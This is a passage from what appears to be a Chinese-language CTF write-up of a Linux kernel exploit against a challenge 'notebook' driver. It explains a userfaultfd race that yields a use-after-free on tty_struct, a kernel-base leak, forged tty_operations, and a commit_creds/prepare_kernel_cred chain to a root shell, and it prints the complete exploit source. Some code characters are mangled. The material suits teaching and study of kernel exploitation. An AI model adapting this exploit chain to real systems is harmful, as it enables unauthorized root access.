ioctl(note_fd, 0x100, ¬e);
};
void delete(size_t index)
{
struct chunk note = {
.index = index,
};
ioctl(note_fd, 0x200, ¬e);
};
void edit(size_t index,size_t size,char *buf)
{
struct chunk note = {
.index = index,
.size = size,
.buf = buf,
};
ioctl(note_fd, 0x300, ¬e);
};
void gift(void *buf)
{
struct chunk note = {
.buf = buf,
};
ioctl(note_fd, 0x64, ¬e);
};
ssize_t noteRead(int idx, void *buf)
{
return read(note_fd, buf, idx);
}
ssize_t noteWrite(int idx, void *buf)
{
return write(note_fd, buf, idx);
}
void* fixSizeByAdd(void *args)
{
sem_wait(&evil_add_sem);
add(0, 0x60, uffd_buf);
}
void* constructUAF(void * args)
{
sem_wait(&evil_edit_sem);
edit(0, 0, uffd_buf);
}
int main() {
struct Notebook kernel_notebook[NOTE_NUM];
int tty_fd;
struct tty_operations fake_tty_ops;
size_t fake_tty_struct_data[0x100], tty_ops, orig_tty_struct_data[0x100];
pthread_t uffd_monitor_thread, add_fix_size_thread, edit_uaf_thread;
size_t tty_struct_addr, fake_tty_ops_addr;
save_status();
bind_core(0);
sem_init(&evil_add_sem, 0, 0);
sem_init(&evil_edit_sem, 0, 0);
note_fd = open("/dev/notebook", O_RDWR);
if (note_fd < 0) {
printf(ERROR_MSG("Failed open /dev/note"));
exit(-1);
}
log_success("open /dev/note\n");
puts("[*] register userfaultfd...");
uffd_buf = (char *) mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
register_userfaultfd_for_thread_stucking(&uffd_monitor_thread, uffd_buf, 0x1000);
/* get a tty-size object */
puts("[*] allocating tty_struct-size object...");
add(0,0x10,'alpha-win-kernel');
edit(0,TTY_STRUCT_SIZE,"alpha-win-kernel");
return 0;
}效果展示:
第一次add操作之后:

edit修改chunk的大小之后:

2. UAF by userfaultfd.
这里开始利用race condition + userfaultfd:
我们先声明 3 个“线程句柄(thread handle)”变量,用来代表 3 个并发执行的线程.
之后使用
pthread_create(&edit_uaf_thread, NULL, constructUAF, NULL);这样的语句来实现创建一个新线程,让这个新线程从constructUAF这个函数开始执行。我们通过下面的这两条语句来实现让noteEdit(size=0)和noteAdd(...)在“同一时间窗口”里执行
pthread_create(&edit_uaf_thread, NULL, constructUAF, NULL);
pthread_create(&add_fix_size_thread, NULL, fixSizeByAdd, NULL);接下来我们来看一下fixSizeByAdd()和constructUAF()两个函数做了什么:
constructUAF()等待一个信号(evil_edit_sem),一旦被唤醒:执行 edit(0, 0, uffd_buf)触发:krealloc(ptr, 0) → kfree,这样继续执行copy_from_user(uffd_buf) → page fault → 卡住
void* constructUAF(void * args)
{
sem_wait(&evil_edit_sem);
edit(0, 0, uffd_buf);
}fixSizeByAdd()同样先等信号,一旦被唤醒:立刻 add把 刚刚被 free 的 slab 重新占用
void* fixSizeByAdd(void *args)
{
sem_wait(&evil_add_sem);
add(0, 0x60, uffd_buf);
}这里解释一下为什么edit和add执行copy_from_user(&name, content, 0x100);会被卡住:
这是因为copy_from_user() 在访问 uffd_buf 对应的用户页时触发 page fault,而该页被注册为 userfaultfd 的 MISSING 模式;内核不会自行处理这个 fault,而是把处理权交给用户态,因此当前内核线程会被阻塞,直到 userfaultfd handler 明确处理该 fault。
/* UAF by userfaultfd. */
puts("[*] constructing UAF on tty_struct...");
pthread_create(&edit_uaf_thread, NULL, constructUAF, NULL);// 在sem_wait(&evil_edit_sem);处阻塞
pthread_create(&add_fix_size_thread, NULL, fixSizeByAdd, NULL);// 在sem_wait(&evil_add_sem);处阻塞
sem_post(&evil_edit_sem);
sleep(1);
sem_post(&evil_add_sem);
sleep(1);效果展示:

3.leak kernel_base by tty_struct
分配 tty_struct 对象,由于我们刚刚将一个tty_struct_size大小的堆块给释放掉,所以我们这里会将这个堆块给申请回来,同时我们也实现了UAF
/* leak kernel_base by tty_struct */
puts("[*] leaking kernel_base by tty_struct");
// 分配 tty_struct 对象,由于我们刚刚将一个tty_struct_size大小的堆块给释放掉,所以我们这里会将这个堆块给申请回来
tty_fd = open("/dev/ptmx", O_RDWR| O_NOCTTY);
noteRead(0, orig_tty_struct_data);
if (*(int*) orig_tty_struct_data != 0x5401) {
log_error("failed to hit the tty_struct!");
}
tty_ops = orig_tty_struct_data[3];
kernel_offset = ((tty_ops & 0xfff) == (pty_unix98_ops & 0xfff)
? (tty_ops - pty_unix98_ops) : tty_ops - ptm_unix98_ops);
kernel_base += kernel_offset;
log_success("Kernel offset:0x%lx", kernel_offset);
log_success("Kernel base: 0x%lx", kernel_base);效果展示:

4.construct fake tty_ops
利用如下操作来实现创造一个fake tty_ops。这里解释一下为什么选择劫持tty_operations 中的 ioctl 而不是 write,因为 tty_struct[4] 处成员ldisc_sem为信号量,在执行到 work_for_cpu_fn 之前该值会被更改
需要注意的是 tty_operations 中的 ioctl 并不是直接执行的,此前需要经过多道检查,因此我们应当传入恰当的参数
log_info("constructing fake tty_ops...");
fake_tty_ops.ioctl = kernel_base + work_for_cpu_fn;
add(1,0x60,temp_page);
edit(1,sizeof(struct tty_operations),temp_page);
noteWrite(1,&fake_tty_ops);实现效果:

5.get kernel addr
通过以下脚本来实现kernel addr的泄露
/* get kernel addr of tty_struct and tty_ops by gift */
log_info("leaking kernel heap addr by gift...");
gift(&kernel_notebook);
tty_struct_addr = kernel_notebook[0].ptr;
fake_tty_ops_addr = kernel_notebook[1].ptr;
log_success("tty_struct_addr = 0x%lx",tty_struct_addr);
log_success("fake_tty_ops_addr = 0x%lx",fake_tty_ops_addr);效果展示:

6. prepare_kernel_cred(NULL)
利用如下代码实现这样的调用链子:
sys_ioctl
└─ do_vfs_ioctl
└─ tty_ioctl
└─ tty->ops->ioctl(tty, cmd, arg)
↑
这里已经是你伪造的 ops /* prepare_kernel_cred(NULL) */
log_info("triger commit_creds(prepare_kernel_cred(NULL)) and fix tty...");
memcpy(fake_tty_struct_data, orig_tty_struct_data, 0x2e0);
fake_tty_struct_data[3] = fake_tty_ops_addr;
fake_tty_struct_data[4] = kernel_offset + prepare_kernel_cred;
fake_tty_struct_data[5] = NULL;
log_info("fake_tty_struct_data is =");
print_binary(&fake_tty_struct_data,0x40);
noteWrite(0, fake_tty_struct_data);
ioctl(tty_fd, 233, 233);效果如下:


可以看到程序将执行的返回结果保存到了这个字段中

对照include/linux/tty.h中定义的struct tty_struct:
struct tty_struct {
int magic;
struct kref kref;
struct device *dev;
struct tty_driver *driver;
const struct tty_operations *ops;
int index;
/* Protects ldisc changes: Lock tty not pty */
struct ld_semaphore ldisc_sem;
struct tty_ldisc *ldisc;
struct mutex atomic_write_lock;
struct mutex legacy_mutex;
struct mutex throttle_mutex;
struct rw_semaphore termios_rwsem;
struct mutex winsize_mutex;
spinlock_t ctrl_lock;
spinlock_t flow_lock;
/* Termios values are protected by the termios rwsem */
struct ktermios termios, termios_locked;
struct termiox *termiox; /* May be NULL for unsupported */
char name[64];
struct pid *pgrp; /* Protected by ctrl lock */
struct pid *session;
unsigned long flags;
int count;
struct winsize winsize; /* winsize_mutex */
unsigned long stopped:1, /* flow_lock */
flow_stopped:1,
unused:BITS_PER_LONG - 2;
int hw_stopped;
unsigned long ctrl_status:8, /* ctrl_lock */
packet:1,
unused_ctrl:BITS_PER_LONG - 9;
unsigned int receive_room; /* Bytes free for queue */
int flow_change;
struct tty_struct *link;
struct fasync_struct *fasync;
wait_queue_head_t write_wait;
wait_queue_head_t read_wait;
struct work_struct hangup_work;
void *disc_data;
void *driver_data;
spinlock_t files_lock; /* protects tty_files list */
struct list_head tty_files;
#define N_TTY_BUF_SIZE 4096
int closing;
unsigned char *write_buf;
int write_cnt;
/* If the tty has a pending do_SAK, queue it here - akpm */
struct work_struct SAK_work;
struct tty_port *port;
} __randomize_layout;
/* Each of a tty's open files has private_data pointing to tty_file_private */
struct tty_file_private {
struct tty_struct *tty;
struct file *file;
struct list_head list;
};是structtty_ldisc*ldisc;这个字段被覆盖了
7.commit_creds(&root_cred) and root shell
利用下面的代码实现这里的commi_cred(&root_cred)
noteRead(0, fake_tty_struct_data);
fake_tty_struct_data[4] = kernel_offset + commit_creds;
fake_tty_struct_data[5] = fake_tty_struct_data[6];
fake_tty_struct_data[6] = orig_tty_struct_data[6];
noteWrite(0, fake_tty_struct_data);
ioctl(tty_fd, 233, 233);最后直接system(”/bin/sh“)就行
效果展示:

完整脚本如下:
// gcc exploit.c -static -masm=intel -g -o exploit
#include "kpwn.h"
#define ptm_unix98_ops 0xffffffff81e8e440
#define pty_unix98_ops 0xffffffff81e8e320
#define commit_creds 0xffffffff810a9b40
#define work_for_cpu_fn 0xffffffff8109eb90
#define prepare_kernel_cred 0xffffffff810a9ef0
#define TTY_STRUCT_SIZE 0x2e0
#define NOTE_NUM 0x10
struct chunk {
size_t index;
size_t size;
char *buf;
};
struct Notebook{
void *ptr;
size_t size;
};
int note_fd;
sem_t evil_add_sem, evil_edit_sem;
char *uffd_buf;
char temp_page[0x1000] = { "arttnba3" };
void add(size_t index,size_t size,char *buf)
{
struct chunk note = {
.index = index,
.size = size,
.buf = buf,
};
ioctl(note_fd, 0x100, ¬e);
};
void delete(size_t index)
{
struct chunk note = {
.index = index,
};
ioctl(note_fd, 0x200, ¬e);
};
void edit(size_t index,size_t size,char *buf)
{
struct chunk note = {
.index = index,
.size = size,
.buf = buf,
};
ioctl(note_fd, 0x300, ¬e);
};
void gift(void *buf)
{
struct chunk note = {
.buf = buf,
};
ioctl(note_fd, 0x64, ¬e);
};
ssize_t noteRead(int idx, void *buf)
{
return read(note_fd, buf, idx);
}
ssize_t noteWrite(int idx, void *buf)
{
return write(note_fd, buf, idx);
}
void* fixSizeByAdd(void *args)
{
sem_wait(&evil_add_sem);
add(0, 0x60, uffd_buf);
}
void* constructUAF(void * args)
{
sem_wait(&evil_edit_sem);
edit(0, 0, uffd_buf);
}
int main() {
struct Notebook kernel_notebook[NOTE_NUM];
int tty_fd;
struct tty_operations fake_tty_ops;
size_t fake_tty_struct_data[0x100], tty_ops, orig_tty_struct_data[0x100];
pthread_t uffd_monitor_thread, add_fix_size_thread, edit_uaf_thread;
size_t tty_struct_addr, fake_tty_ops_addr;
save_status();
bind_core(0);
sem_init(&evil_add_sem, 0, 0);
sem_init(&evil_edit_sem, 0, 0);
note_fd = open("/dev/notebook", O_RDWR);
if (note_fd < 0) {
printf(ERROR_MSG("Failed open /dev/note"));
exit(-1);
}
log_success("open /dev/note\n");
puts("[*] register userfaultfd...");
uffd_buf = (char *) mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
register_userfaultfd_for_thread_stucking(&uffd_monitor_thread, uffd_buf, 0x1000);
/* get a tty-size object */
puts("[*] allocating tty_struct-size object...");
add(0,0x10,'alpha-win-kernel');
edit(0,TTY_STRUCT_SIZE,"alpha-win-kernel");
/* UAF by userfaultfd. */
puts("[*] constructing UAF on tty_struct...");
pthread_create(&edit_uaf_thread, NULL, constructUAF, NULL);// 在sem_wait(&evil_edit_sem);处阻塞
pthread_create(&add_fix_size_thread, NULL, fixSizeByAdd, NULL);// 在sem_wait(&evil_add_sem);处阻塞
// 信号量+1,constructUAF函数继续执行,krealloc(ptr, 0)实现了在一个线程中将这个堆块给释放掉,随后 copy_from_user(uffd_buf) → userfaultfd 卡住
sem_post(&evil_edit_sem);
sleep(1);
// 信号量+1,fixSizeByAdd函数继续执行,在 UAF 窗口中,分配一个新的 kmalloc 对象
sem_post(&evil_add_sem);// 实现将这个堆块的大小给重写,但是不改变指针
sleep(1);
/* leak kernel_base by tty_struct */
puts("[*] leaking kernel_base by tty_struct");
// 分配 tty_struct 对象,由于我们刚刚将一个tty_struct_size大小的堆块给释放掉,所以我们这里会将这个堆块给申请回来
tty_fd = open("/dev/ptmx", O_RDWR| O_NOCTTY);
noteRead(0, orig_tty_struct_data);
if (*(int*) orig_tty_struct_data != 0x5401) {
log_error("failed to hit the tty_struct!");
}
tty_ops = orig_tty_struct_data[3];
kernel_offset = ((tty_ops & 0xfff) == (pty_unix98_ops & 0xfff)
? (tty_ops - pty_unix98_ops) : tty_ops - ptm_unix98_ops);
kernel_base += kernel_offset;
log_success("Kernel offset:0x%lx", kernel_offset);
log_success("Kernel base: 0x%lx", kernel_base);
/* construct fake tty_ops */
log_info("constructing fake tty_ops...");
fake_tty_ops.ioctl = kernel_offset + work_for_cpu_fn;
add(1,0x60,temp_page);
edit(1,sizeof(struct tty_operations),temp_page);
noteWrite(1,&fake_tty_ops);
/* get kernel addr of tty_struct and tty_ops by gift */
log_info("leaking kernel heap addr by gift...");
gift(&kernel_notebook);
tty_struct_addr = kernel_notebook[0].ptr;
fake_tty_ops_addr = kernel_notebook[1].ptr;
log_success("tty_struct_addr = 0x%lx",tty_struct_addr);
log_success("fake_tty_ops_addr = 0x%lx",fake_tty_ops_addr);
/* prepare_kernel_cred(NULL) */
log_info("triger commit_creds(prepare_kernel_cred(NULL)) and fix tty...");
memcpy(fake_tty_struct_data, orig_tty_struct_data, 0x2e0);
fake_tty_struct_data[3] = fake_tty_ops_addr;
fake_tty_struct_data[4] = kernel_offset + prepare_kernel_cred;
fake_tty_struct_data[5] = NULL;
log_info("fake_tty_struct_data is =");
print_binary(&fake_tty_struct_data,0x40);
noteWrite(0, fake_tty_struct_data);
ioctl(tty_fd, 233, 233);
/* commit_creds(&root_cred) */
noteRead(0, fake_tty_struct_data);
fake_tty_struct_data[4] = kernel_offset + commit_creds;
fake_tty_struct_data[5] = fake_tty_struct_data[6];
// fake_tty_struct_data[6] = orig_tty_struct_data[6];
noteWrite(0, fake_tty_struct_data);
ioctl(tty_fd, 233, 233);
/* pop root shell */
get_root_shell();
return 0;
}